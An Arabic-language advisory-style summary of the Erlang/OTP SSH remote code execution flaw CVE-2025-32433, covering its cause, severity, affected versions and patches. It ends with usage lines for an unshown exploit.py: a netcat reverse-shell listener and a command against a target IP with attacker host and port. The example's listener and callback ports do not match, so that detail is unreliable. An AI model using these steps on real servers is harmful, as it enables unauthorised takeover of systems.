
ملخص ونظرة عامة على الهجوم CVE-2025-32433
CVE-2025-32433 ملخص ونظرة عامة على الهجوم
CVE-2025-32433 هي ثغرة حرجة في تنفيذ التعليمات البرمجية عن بُعد (RCE) بدون مصادقة في خادم SSH الخاص بـ Erlang/OTP، تم الكشف عنها في 16 أبريل 2025. Erlang/OTP SSH هي مكتبة تُستخدم في تطبيقات موزعة واتصالات متنوعة. تنشأ الثغرة من المعالجة غير الصحيحة لرسائل بروتوكول SSH: يفشل الخادم في فرض تسلسل المصادقة الطبيعي، مما يسمح للمهاجم بإرسال رسائل SSH مصممة خصيصًا قبل المصادقة. ومن خلال ذلك، يمكن للمهاجم حقن وتنفيذ كود Erlang عشوائي على الخادم nvd.nist.gov offsec.com . في المصطلحات العملية، هذا يعني أن المهاجم الذي لديه وصول شبكي إلى خادم SSH الخاص بـ Erlang/OTP المعرض للخطر (غالبًا ما يعمل بصلاحيات الجذر) يمكنه تشغيل قشرة عكسية أو تنفيذ أوامر دون أي بيانات اعتماد، مما يؤدي إلى اختراق النظام بالكامل nvd.nist.gov offsec.com . تم تصنيف هذه الثغرة بدرجة CVSS 10.0 (أقصى خطورة) offsec.com .
الإصدارات المتأثرة هي جميع إصدارات Erlang/OTP الأقل من OTP-27.3.3 أو OTP-26.2.5.11 أو OTP-25.3.2.20 (الإصدارات التي تم تصحيحها) nvd.nist.gov offsec.com . غالبًا ما تشمل الأنظمة المتأثرة خوادم Linux أو الأجهزة التي تعمل بخدمة SSH مبنية على Erlang (يجب عدم الخلط بينها وبين OpenSSH). والأهم من ذلك، أن خوادم OpenSSH الافتراضية على Linux/BSD ليست عرضة للخطر offsec.com . يجب على المستخدمين افتراض أن أي خادم SSH مكشوف من Erlang/OTP متأثر، وتطبيق التصحيحات الرسمية أو تعطيل خدمة SSH فورًا.
يعمل الهجوم عن طريق بدء اتصال SSH ثم إرسال سلسلة من رسائل SSH خارج الترتيب. :
الاستخدام:
sudo chmod +x exploit.py
nc -nvlp
python3 exploit.py -t -p 22 --lhost --lport
مثال:
nc -nvlp 5555
python3 exploit.py -t 10.10.22.111 -p 22 --lhost 10.12.33.111 --lport 55555